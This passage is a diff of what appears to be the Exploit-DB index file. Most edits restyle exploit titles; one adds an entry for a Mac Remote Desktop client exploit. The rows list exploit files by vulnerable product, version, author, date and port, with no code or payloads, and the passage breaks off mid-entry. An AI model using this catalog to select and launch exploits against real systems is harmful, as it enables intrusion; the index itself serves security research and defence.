- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 @@ -8615,7 +8615,7 @@ id,file,description,date,author,platform,type,port 39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 -39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 +39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0 40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0 @@ -8761,6 +8761,7 @@ id,file,description,date,author,platform,type,port 41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0 41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0 41144,platforms/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",windows,local,0 +41149,platforms/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",osx,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -8796,7 +8797,7 @@ id,file,description,date,author,platform,type,port 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80 -57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 +57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 @@ -8891,10 +8892,10 @@ id,file,description,date,author,platform,type,port 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21 275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 -277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 -279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 -280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 -282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 +277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 +279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 +280,platforms/solaris/remote/280.c,"BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 +282,platforms/linux/remote/282.c,"BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 @@ -9119,7 +9120,7 @@ id,file,description,date,author,platform,type,port 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 -1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 +1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 @@ -9138,8 +9139,8 @@ id,file,description,date,author,platform,type,port 1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 -1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution",2005-10-11,RusH,linux,remote,0 -1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0 +1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,linux,remote,0 +1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 @@ -9194,7 +9195,7 @@ id,file,description,date,author,platform,type,port 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 -1519,platforms/osx/remote/1519.pm,"Apple Mac OSX Safari Browser - (Safe File) Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 @@ -9215,7 +9216,7 @@ id,file,description,date,author,platform,type,port 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,anonymous,windows,remote,8080 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 -1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 +1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0 @@ -9225,12 +9226,12 @@ id,file,description,date,author,platform,type,port 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0 -1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 +1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 1862,platforms/cgi/remote/1862.c,"iShopCart - vGetPost() Remote Buffer Overflow (cgi)",2006-06-02,K-sPecial,cgi,remote,0 1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 1889,platforms/hardware/remote/1889.txt,"D-Link (DWL Series) Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 -1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 +1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,multiple,remote,10000 @@ -9240,13 +9241,13 @@ id,file,description,date,author,platform,type,port 2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",windows,remote,0 2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote,0 2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote,0 -2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 +2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,windows,remote,0 -2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 +2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 @@ -9254,8 +9255,8 @@ id,file,description,date,author,platform,type,port 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 -2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 -2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 +2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 +2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 @@ -9265,7 +9266,7 @@ id,file,description,date,author,platform,type,port 2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)",2006-08-29,psylocn,windows,remote,0 2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote,0 -2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 +2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - 'Redirect.bat' Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80 2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 2355,platforms/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 @@ -9274,7 +9275,7 @@ id,file,description,date,author,platform,type,port 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - (VML) Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote,0 2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - (VML) Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 -2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 +2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote,0 2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow",2006-09-27,h07,windows,remote,80 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 @@ -9294,7 +9295,7 @@ id,file,description,date,author,platform,type,port 2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 -2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - (nfsd.exe) Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 +2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 @@ -9312,7 +9313,7 @@ id,file,description,date,author,platform,type,port 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 -2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 +2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Long Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 @@ -9343,8 +9344,8 @@ id,file,description,date,author,platform,type,port 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption",2007-01-21,luoluo,windows,remote,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote,0 -3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 -3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 +3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 +3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 3244,platforms/windows/remote/3244.py,"CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow",2007-02-01,"Winny Thomas",windows,remote,1900 3264,platforms/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 3265,platforms/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 @@ -9361,7 +9362,7 @@ id,file,description,date,author,platform,type,port 3320,platforms/windows/remote/3320.pl,"MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String",2007-02-18,fuGich,linux,remote,110 3335,platforms/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 -3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 +3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - 'location.hostname' Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 3358,platforms/multiple/remote/3358.pl,"Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3359,platforms/multiple/remote/3359.pl,"Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3363,platforms/multiple/remote/3363.pl,"Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection",2007-02-23,bunker,multiple,remote,0 @@ -9372,7 +9373,7 @@ id,file,description,date,author,platform,type,port 3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 3381,platforms/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 -3388,platforms/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 +3388,platforms/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 @@ -9403,7 +9404,7 @@ id,file,description,date,author,platform,type,port 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 -3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 +3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53 @@ -9421,7 +9422,7 @@ id,file,description,date,author,platform,type,port 3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0 -3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) 